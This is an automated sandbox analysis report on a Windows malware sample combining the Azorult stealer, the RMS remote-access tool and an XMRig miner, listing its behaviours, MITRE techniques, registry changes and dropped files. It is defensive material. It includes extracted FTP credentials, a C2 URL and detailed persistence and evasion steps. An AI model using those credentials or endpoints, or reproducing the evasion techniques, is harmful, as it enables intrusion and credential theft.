azorult | 390d7472201e8ea9bdc6c7fa2b4ab1f6faca02071f1f997037cc5f52759a9cb6

Resubmissions

12-11-2021 18:04

211112-wnzb8aahhm 10

19-11-2020 10:08

201119-rhwlt38jrx 10

18-11-2020 17:26

201118-htd4fq29va 10

Analysis

max time kernel
1803s
max time network
1808s
platform
windows10_x64
resource
win10v20201028
submitted
19-11-2020 10:08

Sharing

Copy URL

Twitter E-mail

Report Analysis Logs

General

Target

LtHv0O2KZDK4M637.exe

Score

10^/10

azorult rms xmrig aspackv2 discovery evasion infostealer miner persistence rat spyware stealer trojan upx

Malware Config

Extracted

Credentials

Protocol: ftp
Host:
109.248.203.81
Port:
21
Username:
alex
Password:
easypassword

Extracted

Family

azorult

http://195.245.112.115/index.php

Signatures

Azorult
An information stealer that was first discovered in 2016, targeting browsing history and passwords.
trojan infostealer azorult
Modifies Windows Defender Real-time Protection settings 3 TTPs
evasion trojan

Modify Registry
T1112

Modify Existing Service
T1031

Disabling Security Tools
T1089
Modifies visiblity of hidden/system files in Explorer 2 TTPs
evasion

Hidden Files and Directories
T1158

Modify Registry
T1112
RMS
Remote Manipulator System (RMS) is a remote access tool developed by Russian organization TektonIT.
trojan rat rms
UAC bypass 3 TTPs
evasion trojan

Bypass User Account Control
T1088

Disabling Security Tools
T1089

Modify Registry
T1112
Windows security bypass 2 TTPs
evasion trojan

Disabling Security Tools
T1089

Modify Registry
T1112
xmrig
XMRig is a high performance, open source, cross platform CPU/GPU miner.
miner xmrig

ACProtect 1.3x - 1.4x DLL software 2 IoCs

Detects file using ACProtect software.

resource	yara_rule
behavioral14/files/0x000100000001abca-391.dat	acprotect
behavioral14/files/0x000100000001abcb-392.dat	acprotect

Detected Stratum cryptominer command
Looks to be attempting to contact Stratum mining pool.
miner
Grants admin privileges 1 TTPs
Uses net.exe to modify the user's privileges.

Account Manipulation
T1098

XMRig Miner Payload 2 IoCs

miner

resource	yara_rule
behavioral14/files/0x0005000000019c0b-969.dat	xmrig
behavioral14/files/0x0005000000019c0b-975.dat	xmrig

ASPack v2.12-2.42 9 IoCs

Detects executables packed with ASPack v2.12-2.42

aspackv2

resource	yara_rule
behavioral14/files/0x000700000001abc1-377.dat	aspack_v212_v242
behavioral14/files/0x000700000001abc1-378.dat	aspack_v212_v242
behavioral14/files/0x000700000001abc1-384.dat	aspack_v212_v242
behavioral14/files/0x000700000001abc1-389.dat	aspack_v212_v242
behavioral14/files/0x000700000001abc1-390.dat	aspack_v212_v242
behavioral14/files/0x000200000001a50e-393.dat	aspack_v212_v242
behavioral14/files/0x000200000001a50e-397.dat	aspack_v212_v242
behavioral14/files/0x000200000001a50e-396.dat	aspack_v212_v242
behavioral14/files/0x000200000001a50e-434.dat	aspack_v212_v242

Blocks application from running via registry modification
Adds application to list of disallowed applications.
evasion

Drops file in Drivers directory 4 IoCs

description	ioc	Process
File opened for modification	C:\Windows\SysWOW64\drivers\conhost.exe	taskhost.exe
File opened for modification	C:\Windows\System32\drivers\etc\hosts	LtHv0O2KZDK4M637.exe
File opened for modification	C:\Windows\System32\drivers\etc\hosts	cmd.exe
File created	C:\Windows\SysWOW64\drivers\conhost.exe	taskhost.exe

Executes dropped EXE 20 IoCs

pid	Process
3692	wini.exe
4032	winit.exe
2156	rutserv.exe
2092	rutserv.exe
3976	sys.exe
4080	rutserv.exe
360	rutserv.exe
2412	rfusclient.exe
728	rfusclient.exe
640	cheat.exe
2128	rfusclient.exe
3096	taskhost.exe
1912	taskhostw.exe
4248	winlogon.exe
4236	R8.exe
4792	Rar.exe
4888	RDPWInst.exe
2544	RDPWInst.exe
5304	audiodg.exe
3040	MicrosoftHost.exe

Modifies Windows Firewall 1 TTPs
evasion

Modify Existing Service
T1031
Registers new Print Monitor 2 TTPs
persistence

Registry Run Keys / Startup Folder
T1060

Modify Registry
T1112
Sets DLL path for service in the registry 2 TTPs
persistence

Registry Run Keys / Startup Folder
T1060

Modify Registry
T1112
Sets file to hidden 1 TTPs
Modifies file attributes to stop it showing in Explorer etc.
evasion

Hidden Files and Directories
T1158
Stops running service(s) 3 TTPs
evasion

Modify Existing Service
T1031

Impair Defenses
T1562

Service Stop
T1489

UPX packed file 4 IoCs

Detects executables packed with UPX/modified UPX open source packer.

upx

resource	yara_rule
behavioral14/files/0x000100000001abca-391.dat	upx
behavioral14/files/0x000100000001abcb-392.dat	upx
behavioral14/files/0x000200000001abd4-479.dat	upx
behavioral14/files/0x000200000001abd4-477.dat	upx

Loads dropped DLL 5 IoCs

pid	Process
3976	sys.exe
3976	sys.exe
3976	sys.exe
3976	sys.exe
4952	svchost.exe

Modifies file permissions 1 TTPs 64 IoCs

discovery

File and Directory Permissions Modification

T1222

pid	Process
5336	icacls.exe
4320	icacls.exe
5376	icacls.exe
5244	icacls.exe
4628	icacls.exe
5412	icacls.exe
4444	icacls.exe
5868	icacls.exe
5908	icacls.exe
4412	icacls.exe
5160	icacls.exe
5228	icacls.exe
5248	icacls.exe
5816	icacls.exe
2416	icacls.exe
3964	icacls.exe
5680	icacls.exe
1736	icacls.exe
5848	icacls.exe
6016	icacls.exe
2268	icacls.exe
6012	icacls.exe
5452	icacls.exe
5132	icacls.exe
3400	icacls.exe
648	icacls.exe
4564	icacls.exe
5760	icacls.exe
6020	icacls.exe
5784	icacls.exe
6056	icacls.exe
1040	icacls.exe
5260	icacls.exe
5396	icacls.exe
6116	icacls.exe
4524	icacls.exe
5764	icacls.exe
5904	icacls.exe
5644	icacls.exe
5448	icacls.exe
2032	icacls.exe
5488	icacls.exe
5624	icacls.exe
5984	icacls.exe
5788	icacls.exe
1716	icacls.exe
4040	icacls.exe
5748	icacls.exe
5436	icacls.exe
2536	icacls.exe
5444	icacls.exe
4396	icacls.exe
5584	icacls.exe
5040	icacls.exe
5684	icacls.exe
5884	icacls.exe
5840	icacls.exe
5552	icacls.exe
5196	icacls.exe
6124	icacls.exe
5404	icacls.exe
2588	icacls.exe
5736	icacls.exe
2752	icacls.exe

Reads data files stored by FTP clients 2 TTPs
Tries to access configuration files associated with programs like FileZilla.
spyware stealer

Data from Local System
T1005

Credentials in Files
T1081
Reads local data of messenger clients 2 TTPs
Infostealers often target stored data of messaging applications, which can include saved credentials and account information.
spyware stealer

Data from Local System
T1005

Credentials in Files
T1081
Reads user/profile data of local email clients 2 TTPs
Email clients store some user data on disk where infostealers will often target it.
spyware stealer

Data from Local System
T1005

Credentials in Files
T1081
Reads user/profile data of web browsers 2 TTPs
Infostealers often target stored browser data, which can include saved credentials etc.
spyware stealer

Data from Local System
T1005

Credentials in Files
T1081
Accesses cryptocurrency files/wallets, possible credential harvesting 2 TTPs
spyware

Data from Local System
T1005

Credentials in Files
T1081

Adds Run key to start application 2 TTPs 4 IoCs

persistence

Registry Run Keys / Startup Folder

T1060

Modify Registry

T1112

description	ioc	Process
Key created	\REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\Windows\CurrentVersion\Run	LtHv0O2KZDK4M637.exe
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\Windows\CurrentVersion\Run\Realtek HD Audio = "C:\\ProgramData\\RealtekHD\\taskhostw.exe"	LtHv0O2KZDK4M637.exe
Key created	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Run	taskhostw.exe
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\Realtek HD Audio = "C:\\ProgramData\\RealtekHD\\taskhostw.exe"	taskhostw.exe

Checks installed software on the system 1 TTPs
Looks up Uninstall key entries in the registry to enumerate software on the system.
discovery

Query Registry
T1012

Checks whether UAC is enabled 1 TTPs 1 IoCs

evasion trojan

System Information Discovery

T1082

description	ioc	Process
Set value (int)	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA = "0"	LtHv0O2KZDK4M637.exe

Legitimate hosting services abused for malware hosting/C2 1 TTPs

Web Service
T1102

Looks up external IP address via web service 1 IoCs

Uses a legitimate IP lookup service to find the infected system's external IP.

flow	ioc
13	ip-api.com

Modifies WinLogon 2 TTPs 7 IoCs

persistence

Winlogon Helper DLL

T1004

Modify Registry

T1112

description	ioc	Process
Set value (int)	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon\SpecialAccounts\UserList\John = "0"	LtHv0O2KZDK4M637.exe
Set value (int)	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon\AllowMultipleTSSessions = "1"	RDPWInst.exe
Key created	\REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\Windows NT\CurrentVersion\Winlogon\SpecialAccounts\UserList	LtHv0O2KZDK4M637.exe
Key created	\REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\Windows NT\CurrentVersion\Winlogon\SpecialAccounts	LtHv0O2KZDK4M637.exe
Set value (int)	\REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\Windows NT\CurrentVersion\Winlogon\SpecialAccounts\UserList\John = "0"	LtHv0O2KZDK4M637.exe
Key created	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon\SpecialAccounts\UserList	LtHv0O2KZDK4M637.exe
Key created	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon\SpecialAccounts	LtHv0O2KZDK4M637.exe

Drops file in Program Files directory 31 IoCs

description	ioc	Process
File opened for modification	C:\Program Files (x86)\360	taskhost.exe
File opened for modification	C:\Program Files (x86)\Kaspersky Lab	taskhost.exe
File opened for modification	C:\Program Files\AVAST Software\Avast	attrib.exe
File created	C:\Program Files\RDP Wrapper\rdpwrap.ini	RDPWInst.exe
File opened for modification	C:\Program Files\ByteFence	taskhost.exe
File opened for modification	C:\Program Files\Kaspersky Lab	taskhost.exe
File opened for modification	C:\Program Files (x86)\GRIZZLY Antivirus	taskhost.exe
File opened for modification	C:\Program Files\Enigma Software Group	taskhost.exe
File opened for modification	C:\Program Files\AVAST Software	taskhost.exe
File opened for modification	C:\Program Files\ESET	attrib.exe
File opened for modification	C:\Program Files\RDP Wrapper	attrib.exe
File opened for modification	C:\Program Files (x86)\SpyHunter	taskhost.exe
File opened for modification	C:\Program Files (x86)\Zaxar	taskhost.exe
File opened for modification	C:\Program Files (x86)\AVAST Software	taskhost.exe
File opened for modification	C:\Program Files\COMODO	taskhost.exe
File opened for modification	C:\Program Files\RDP Wrapper\rdpwrap.dll	attrib.exe
File created	C:\Program Files\Common Files\System\iexplore.exe	taskhost.exe
File opened for modification	C:\Program Files\Malwarebytes	taskhost.exe
File opened for modification	C:\Program Files\SpyHunter	taskhost.exe
File opened for modification	C:\Program Files\ESET	taskhost.exe
File opened for modification	C:\Program Files\360\Total Security	attrib.exe
File created	C:\Program Files\RDP Wrapper\rdpwrap.dll	RDPWInst.exe
File created	C:\Program Files\Common Files\System\iediagcmd.exe	taskhost.exe
File opened for modification	C:\Program Files\Malwarebytes\Anti-Malware	attrib.exe
File opened for modification	C:\Program Files (x86)\Microsoft JDX	taskhost.exe
File opened for modification	C:\Program Files (x86)\AVG	taskhost.exe
File opened for modification	C:\Program Files (x86)\Cezurity	taskhost.exe
File opened for modification	C:\Program Files\Cezurity	taskhost.exe
File opened for modification	C:\Program Files (x86)\Panda Security	taskhost.exe
File opened for modification	C:\Program Files\RDP Wrapper\rdpwrap.ini	attrib.exe
File opened for modification	C:\Program Files\AVG	taskhost.exe

Drops file in Windows directory 8 IoCs

description	ioc	Process
File created	C:\Windows\java.exe	taskhost.exe
File opened for modification	C:\Windows\java.exe	taskhost.exe
File opened for modification	C:\WINDOWS\McMwt	attrib.exe
File created	C:\Windows\boy.exe	taskhost.exe
File opened for modification	C:\Windows\boy.exe	taskhost.exe
File created	C:\Windows\svchost.exe	taskhost.exe
File opened for modification	C:\Windows\svchost.exe	taskhost.exe
File opened for modification	C:\Windows\NetworkDistribution	taskhost.exe

Launches sc.exe
Sc.exe is a Windows utlilty to control services on the system.
Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s). Likely ransomware behaviour.

System Information Discovery
T1082

Checks SCSI registry key(s) 3 TTPs 6 IoCs

SCSI information is often read in order to detect sandboxing environments.

Query Registry

T1012

Peripheral Device Discovery

T1120

System Information Discovery

T1082

description	ioc	Process
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CdRom&Ven_Sanu&Prod_Sanu_DVD-ROM\4&37ce57ba&0&010000	spoolsv.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CdRom&Ven_Sanu&Prod_Sanu_DVD-ROM\4&37ce57ba&0&010000\Properties\{3b2ce006-5e61-4fde-bab8-9b8aac9b26df}\0002	spoolsv.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\Disk&Ven_&Prod_HeartDisk\4&37ce57ba&0&000000	spoolsv.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\Disk&Ven_&Prod_HeartDisk\4&37ce57ba&0&000000\Properties\{3b2ce006-5e61-4fde-bab8-9b8aac9b26df}\0002	spoolsv.exe
Key value queried	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CdRom&Ven_Sanu&Prod_Sanu_DVD-ROM\4&37ce57ba&0&010000\HardwareID	spoolsv.exe
Key value queried	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\Disk&Ven_&Prod_HeartDisk\4&37ce57ba&0&000000\HardwareID	spoolsv.exe

Checks processor information in registry 2 TTPs 4 IoCs

Processor information is often read in order to detect sandboxing environments.

Query Registry

T1012

System Information Discovery

T1082

description	ioc	Process
Key opened	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0	winit.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\ProcessorNameString	winit.exe
Key opened	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0	sys.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\ProcessorNameString	sys.exe

Delays execution with timeout.exe 9 IoCs

evasion

pid	Process
200	timeout.exe
4576	timeout.exe
4280	timeout.exe
2328	timeout.exe
4088	timeout.exe
4936	timeout.exe
4288	timeout.exe
5796	timeout.exe
2900	timeout.exe

Gathers network information 2 TTPs 1 IoCs

Uses commandline utility to view network configuration.

System Information Discovery

T1082

Command-Line Interface

T1059

pid	Process
2004	ipconfig.exe

Kills process with taskkill 6 IoCs

evasion

pid	Process
4504	taskkill.exe
4544	taskkill.exe
4840	taskkill.exe
4904	taskkill.exe
5940	taskkill.exe
4724	taskkill.exe

Modifies data under HKEY_USERS 18 IoCs

description	ioc	Process
Key created	\REGISTRY\USER\S-1-5-20\Software\Microsoft\Windows NT\CurrentVersion\PrinterPorts	spoolsv.exe
Set value (str)	\REGISTRY\USER\S-1-5-19\Software\Microsoft\Windows NT\CurrentVersion\Devices\Microsoft Print to PDF = "winspool,Ne01:"	spoolsv.exe
Set value (str)	\REGISTRY\USER\S-1-5-20\Software\Microsoft\Windows NT\CurrentVersion\Devices\Microsoft XPS Document Writer = "winspool,Ne00:"	spoolsv.exe
Set value (str)	\REGISTRY\USER\S-1-5-20\Software\Microsoft\Windows NT\CurrentVersion\Devices\Microsoft Print to PDF = "winspool,Ne01:"	spoolsv.exe
Set value (str)	\REGISTRY\USER\S-1-5-20\Software\Microsoft\Windows NT\CurrentVersion\Devices\Fax = "winspool,Ne02:"	spoolsv.exe
Key created	\REGISTRY\USER\S-1-5-19\Software\Microsoft\Windows NT\CurrentVersion\Devices	spoolsv.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows NT\CurrentVersion\Devices	spoolsv.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows NT\CurrentVersion\PrinterPorts	spoolsv.exe
Set value (str)	\REGISTRY\USER\S-1-5-19\Software\Microsoft\Windows NT\CurrentVersion\PrinterPorts\Fax = "winspool,Ne02:,15,45"	spoolsv.exe
Set value (str)	\REGISTRY\USER\S-1-5-19\Software\Microsoft\Windows NT\CurrentVersion\Devices\Microsoft XPS Document Writer = "winspool,Ne00:"	spoolsv.exe
Set value (str)	\REGISTRY\USER\S-1-5-20\Software\Microsoft\Windows NT\CurrentVersion\PrinterPorts\Microsoft XPS Document Writer = "winspool,Ne00:,15,45"	spoolsv.exe
Set value (str)	\REGISTRY\USER\S-1-5-20\Software\Microsoft\Windows NT\CurrentVersion\PrinterPorts\Microsoft Print to PDF = "winspool,Ne01:,15,45"	spoolsv.exe
Set value (str)	\REGISTRY\USER\S-1-5-19\Software\Microsoft\Windows NT\CurrentVersion\Devices\Fax = "winspool,Ne02:"	spoolsv.exe
Set value (str)	\REGISTRY\USER\S-1-5-20\Software\Microsoft\Windows NT\CurrentVersion\PrinterPorts\Fax = "winspool,Ne02:,15,45"	spoolsv.exe
Key created	\REGISTRY\USER\S-1-5-19\Software\Microsoft\Windows NT\CurrentVersion\PrinterPorts	spoolsv.exe
Key created	\REGISTRY\USER\S-1-5-20\Software\Microsoft\Windows NT\CurrentVersion\Devices	spoolsv.exe
Set value (str)	\REGISTRY\USER\S-1-5-19\Software\Microsoft\Windows NT\CurrentVersion\PrinterPorts\Microsoft XPS Document Writer = "winspool,Ne00:,15,45"	spoolsv.exe
Set value (str)	\REGISTRY\USER\S-1-5-19\Software\Microsoft\Windows NT\CurrentVersion\PrinterPorts\Microsoft Print to PDF = "winspool,Ne01:,15,45"	spoolsv.exe

Modifies registry class 6 IoCs

description	ioc	Process
Key created	\REGISTRY\MACHINE\SOFTWARE\Classes\MIME\Database\Charset	winit.exe
Key created	\REGISTRY\MACHINE\SOFTWARE\Classes\MIME\Database\Codepage	winit.exe
Key created	\REGISTRY\USER\S-1-5-21-3341490333-719741536-2920803124-1000_Classes\Local Settings	R8.exe
Key created	\REGISTRY\USER\S-1-5-21-3341490333-719741536-2920803124-1000_Classes\Local Settings	cmd.exe
Key created	\REGISTRY\USER\S-1-5-21-3341490333-719741536-2920803124-1000_Classes\Local Settings	wini.exe
Key created	\REGISTRY\USER\S-1-5-21-3341490333-719741536-2920803124-1000_Classes\MIME\Database	winit.exe

NTFS ADS 2 IoCs

description	ioc	Process
File opened for modification	C:\ProgramData\Microsoft\Intel\winmgmts:\localhost\root\CIMV2	taskhostw.exe
File opened for modification	C:\Users\Admin\AppData\Local\Temp\WinMgmts:\	LtHv0O2KZDK4M637.exe

Runs .reg file with regedit 2 IoCs

pid	Process
1140	regedit.exe
2576	regedit.exe

Runs net.exe

Suspicious behavior: EnumeratesProcesses 64 IoCs

pid	Process
1316	LtHv0O2KZDK4M637.exe
1316	LtHv0O2KZDK4M637.exe
1316	LtHv0O2KZDK4M637.exe
1316	LtHv0O2KZDK4M637.exe
1316	LtHv0O2KZDK4M637.exe
1316	LtHv0O2KZDK4M637.exe
1316	LtHv0O2KZDK4M637.exe
1316	LtHv0O2KZDK4M637.exe
1316	LtHv0O2KZDK4M637.exe
1316	LtHv0O2KZDK4M637.exe
1316	LtHv0O2KZDK4M637.exe
1316	LtHv0O2KZDK4M637.exe
1316	LtHv0O2KZDK4M637.exe
1316	LtHv0O2KZDK4M637.exe
1316	LtHv0O2KZDK4M637.exe
1316	LtHv0O2KZDK4M637.exe
1316	LtHv0O2KZDK4M637.exe
1316	LtHv0O2KZDK4M637.exe
1316	LtHv0O2KZDK4M637.exe
1316	LtHv0O2KZDK4M637.exe
1316	LtHv0O2KZDK4M637.exe
1316	LtHv0O2KZDK4M637.exe
1316	LtHv0O2KZDK4M637.exe
1316	LtHv0O2KZDK4M637.exe
1316	LtHv0O2KZDK4M637.exe
1316	LtHv0O2KZDK4M637.exe
1316	LtHv0O2KZDK4M637.exe
1316	LtHv0O2KZDK4M637.exe
1316	LtHv0O2KZDK4M637.exe
1316	LtHv0O2KZDK4M637.exe
1316	LtHv0O2KZDK4M637.exe
1316	LtHv0O2KZDK4M637.exe
1316	LtHv0O2KZDK4M637.exe
1316	LtHv0O2KZDK4M637.exe
1316	LtHv0O2KZDK4M637.exe
1316	LtHv0O2KZDK4M637.exe
1316	LtHv0O2KZDK4M637.exe
1316	LtHv0O2KZDK4M637.exe
1316	LtHv0O2KZDK4M637.exe
1316	LtHv0O2KZDK4M637.exe
2156	rutserv.exe
2156	rutserv.exe
2156	rutserv.exe
2156	rutserv.exe
2156	rutserv.exe
2156	rutserv.exe
1316	LtHv0O2KZDK4M637.exe
1316	LtHv0O2KZDK4M637.exe
1316	LtHv0O2KZDK4M637.exe
1316	LtHv0O2KZDK4M637.exe
1316	LtHv0O2KZDK4M637.exe
1316	LtHv0O2KZDK4M637.exe
1316	LtHv0O2KZDK4M637.exe
1316	LtHv0O2KZDK4M637.exe
1316	LtHv0O2KZDK4M637.exe
1316	LtHv0O2KZDK4M637.exe
1316	LtHv0O2KZDK4M637.exe
1316	LtHv0O2KZDK4M637.exe
1316	LtHv0O2KZDK4M637.exe
1316	LtHv0O2KZDK4M637.exe
1316	LtHv0O2KZDK4M637.exe
1316	LtHv0O2KZDK4M637.exe
1316	LtHv0O2KZDK4M637.exe
1316	LtHv0O2KZDK4M637.exe

Suspicious behavior: GetForegroundWindowSpam 1 IoCs

pid	Process
1912	taskhostw.exe

Suspicious behavior: LoadsDriver 3 IoCs

pid	Process
624	Process not Found
624	Process not Found
624	Process not Found

Suspicious behavior: SetClipboardViewer 1 IoCs

pid	Process
2128	rfusclient.exe

Suspicious use of AdjustPrivilegeToken 64 IoCs

description	pid	Process
Token: SeDebugPrivilege	2156	rutserv.exe
Token: SeDebugPrivilege	4080	rutserv.exe
Token: SeTakeOwnershipPrivilege	360	rutserv.exe
Token: SeTcbPrivilege	360	rutserv.exe
Token: SeTcbPrivilege	360	rutserv.exe
Token: SeDebugPrivilege	1316	LtHv0O2KZDK4M637.exe
Token: 9800587056091247285	1316	LtHv0O2KZDK4M637.exe
Token: 81688264704	1316	LtHv0O2KZDK4M637.exe
Token: 9800946596438331096	1316	LtHv0O2KZDK4M637.exe
Token: 9800953193397866186	1316	LtHv0O2KZDK4M637.exe
Token: 9800957591443590854	1316	LtHv0O2KZDK4M637.exe
Token: 9800963089000746679	1316	LtHv0O2KZDK4M637.exe
Token: 9800987278260619625	1316	LtHv0O2KZDK4M637.exe
Token: 9800998273366542679	1316	LtHv0O2KZDK4M637.exe
Token: 9801000472389405005	1316	LtHv0O2KZDK4M637.exe
Token: 9801009268480854325	1316	LtHv0O2KZDK4M637.exe
Token: 9801016965060872472	1316	LtHv0O2KZDK4M637.exe
Token: 9801032358229297650	1316	LtHv0O2KZDK4M637.exe
Token: 9801037855786453475	1316	LtHv0O2KZDK4M637.exe
Token: 9801042253832178143	1316	LtHv0O2KZDK4M637.exe
Token: 9801066443108829585	1316	LtHv0O2KZDK4M637.exe
Token: 9801080736765823094	1316	LtHv0O2KZDK4M637.exe
Token: 9801093930894608458	1316	LtHv0O2KZDK4M637.exe
Token: 9801123617711638781	1316	LtHv0O2KZDK4M637.exe
Token: 9801204981582711579	1316	LtHv0O2KZDK4M637.exe
Token: 9801221474262567926	1316	LtHv0O2KZDK4M637.exe
Token: 9801236867447770048	1316	LtHv0O2KZDK4M637.exe
Token: 9801245663539219368	1316	LtHv0O2KZDK4M637.exe
Token: 9801254459639057296	1316	LtHv0O2KZDK4M637.exe
Token: 0	1316	LtHv0O2KZDK4M637.exe
Token: 32431676	1316	LtHv0O2KZDK4M637.exe
Token: 9920249032600393960	1316	LtHv0O2KZDK4M637.exe
Token: 0	1316	LtHv0O2KZDK4M637.exe
Token: 9920249032600393960	1316	LtHv0O2KZDK4M637.exe
Token: 4294967295	1316	LtHv0O2KZDK4M637.exe
Token: 8380654442122313730	1316	LtHv0O2KZDK4M637.exe
Token: SeCreateTokenPrivilege	1316	LtHv0O2KZDK4M637.exe
Token: SeCreateTokenPrivilege	1316	LtHv0O2KZDK4M637.exe
Token: SeCreateTokenPrivilege	1316	LtHv0O2KZDK4M637.exe
Token: SeCreateTokenPrivilege	1316	LtHv0O2KZDK4M637.exe
Token: SeCreateTokenPrivilege	1316	LtHv0O2KZDK4M637.exe
Token: SeCreateTokenPrivilege	1316	LtHv0O2KZDK4M637.exe
Token: SeCreateTokenPrivilege	1316	LtHv0O2KZDK4M637.exe
Token: SeCreateTokenPrivilege	1316	LtHv0O2KZDK4M637.exe
Token: SeCreateTokenPrivilege	1316	LtHv0O2KZDK4M637.exe
Token: SeCreateTokenPrivilege	1316	LtHv0O2KZDK4M637.exe
Token: SeCreateTokenPrivilege	1316	LtHv0O2KZDK4M637.exe
Token: SeCreateTokenPrivilege	1316	LtHv0O2KZDK4M637.exe
Token: SeCreateTokenPrivilege	1316	LtHv0O2KZDK4M637.exe
Token: 0	1316	LtHv0O2KZDK4M637.exe
Token: SeCreateTokenPrivilege	1316	LtHv0O2KZDK4M637.exe
Token: 352391314320704512	1316	LtHv0O2KZDK4M637.exe
Token: 8355617052811384320	1316	LtHv0O2KZDK4M637.exe
Token: 0	1316	LtHv0O2KZDK4M637.exe
Token: 8340409069752597547	1316	LtHv0O2KZDK4M637.exe
Token: 51539607552	1316	LtHv0O2KZDK4M637.exe
Token: 41658760491850744	1316	LtHv0O2KZDK4M637.exe
Token: 6258411252	1316	LtHv0O2KZDK4M637.exe
Token: 353189729361381240	1316	LtHv0O2KZDK4M637.exe
Token: 9799844885896927202	1316	LtHv0O2KZDK4M637.exe
Token: 6937813002834471071	1316	LtHv0O2KZDK4M637.exe
Token: 0	1316	LtHv0O2KZDK4M637.exe
Token: 109213785687977080	1316	LtHv0O2KZDK4M637.exe
Token: 324809444456248960	1316	LtHv0O2KZDK4M637.exe

Suspicious use of SetWindowsHookEx 13 IoCs

pid	Process
4032	winit.exe
2156	rutserv.exe
2092	rutserv.exe
4080	rutserv.exe
360	rutserv.exe
976	WinMail.exe
556	WinMail.exe
3096	taskhost.exe
1912	taskhostw.exe
4236	R8.exe
4248	winlogon.exe
5304	audiodg.exe
3040	MicrosoftHost.exe

Suspicious use of WriteProcessMemory 64 IoCs

description	pid	Process	procid_target
PID 1316 wrote to memory of 3692	1316	LtHv0O2KZDK4M637.exe	75
PID 1316 wrote to memory of 3692	1316	LtHv0O2KZDK4M637.exe	75
PID 1316 wrote to memory of 3692	1316	LtHv0O2KZDK4M637.exe	75
PID 3692 wrote to memory of 1564	3692	wini.exe	76
PID 3692 wrote to memory of 1564	3692	wini.exe	76
PID 3692 wrote to memory of 1564	3692	wini.exe	76
PID 3692 wrote to memory of 4032	3692	wini.exe	77
PID 3692 wrote to memory of 4032	3692	wini.exe	77
PID 3692 wrote to memory of 4032	3692	wini.exe	77
PID 1564 wrote to memory of 3268	1564	WScript.exe	78
PID 1564 wrote to memory of 3268	1564	WScript.exe	78
PID 1564 wrote to memory of 3268	1564	WScript.exe	78
PID 3268 wrote to memory of 1140	3268	cmd.exe	81
PID 3268 wrote to memory of 1140	3268	cmd.exe	81
PID 3268 wrote to memory of 1140	3268	cmd.exe	81
PID 3268 wrote to memory of 2576	3268	cmd.exe	82
PID 3268 wrote to memory of 2576	3268	cmd.exe	82
PID 3268 wrote to memory of 2576	3268	cmd.exe	82
PID 3268 wrote to memory of 200	3268	cmd.exe	83
PID 3268 wrote to memory of 200	3268	cmd.exe	83
PID 3268 wrote to memory of 200	3268	cmd.exe	83
PID 3268 wrote to memory of 2156	3268	cmd.exe	86
PID 3268 wrote to memory of 2156	3268	cmd.exe	86
PID 3268 wrote to memory of 2156	3268	cmd.exe	86
PID 3268 wrote to memory of 2092	3268	cmd.exe	87
PID 3268 wrote to memory of 2092	3268	cmd.exe	87
PID 3268 wrote to memory of 2092	3268	cmd.exe	87
PID 1316 wrote to memory of 3976	1316	LtHv0O2KZDK4M637.exe	88
PID 1316 wrote to memory of 3976	1316	LtHv0O2KZDK4M637.exe	88
PID 1316 wrote to memory of 3976	1316	LtHv0O2KZDK4M637.exe	88
PID 3268 wrote to memory of 4080	3268	cmd.exe	89
PID 3268 wrote to memory of 4080	3268	cmd.exe	89
PID 3268 wrote to memory of 4080	3268	cmd.exe	89
PID 360 wrote to memory of 728	360	rutserv.exe	91
PID 360 wrote to memory of 2412	360	rutserv.exe	92
PID 360 wrote to memory of 728	360	rutserv.exe	91
PID 360 wrote to memory of 2412	360	rutserv.exe	92
PID 360 wrote to memory of 728	360	rutserv.exe	91
PID 360 wrote to memory of 2412	360	rutserv.exe	92
PID 3268 wrote to memory of 3956	3268	cmd.exe	93
PID 3268 wrote to memory of 3956	3268	cmd.exe	93
PID 3268 wrote to memory of 3956	3268	cmd.exe	93
PID 3268 wrote to memory of 988	3268	cmd.exe	94
PID 3268 wrote to memory of 988	3268	cmd.exe	94
PID 3268 wrote to memory of 988	3268	cmd.exe	94
PID 3268 wrote to memory of 1144	3268	cmd.exe	95
PID 3268 wrote to memory of 1144	3268	cmd.exe	95
PID 3268 wrote to memory of 1144	3268	cmd.exe	95
PID 3268 wrote to memory of 2284	3268	cmd.exe	96
PID 3268 wrote to memory of 2284	3268	cmd.exe	96
PID 3268 wrote to memory of 2284	3268	cmd.exe	96
PID 4032 wrote to memory of 976	4032	winit.exe	97
PID 4032 wrote to memory of 976	4032	winit.exe	97
PID 4032 wrote to memory of 976	4032	winit.exe	97
PID 3268 wrote to memory of 2968	3268	cmd.exe	98
PID 3268 wrote to memory of 2968	3268	cmd.exe	98
PID 3268 wrote to memory of 2968	3268	cmd.exe	98
PID 976 wrote to memory of 556	976	WinMail.exe	99
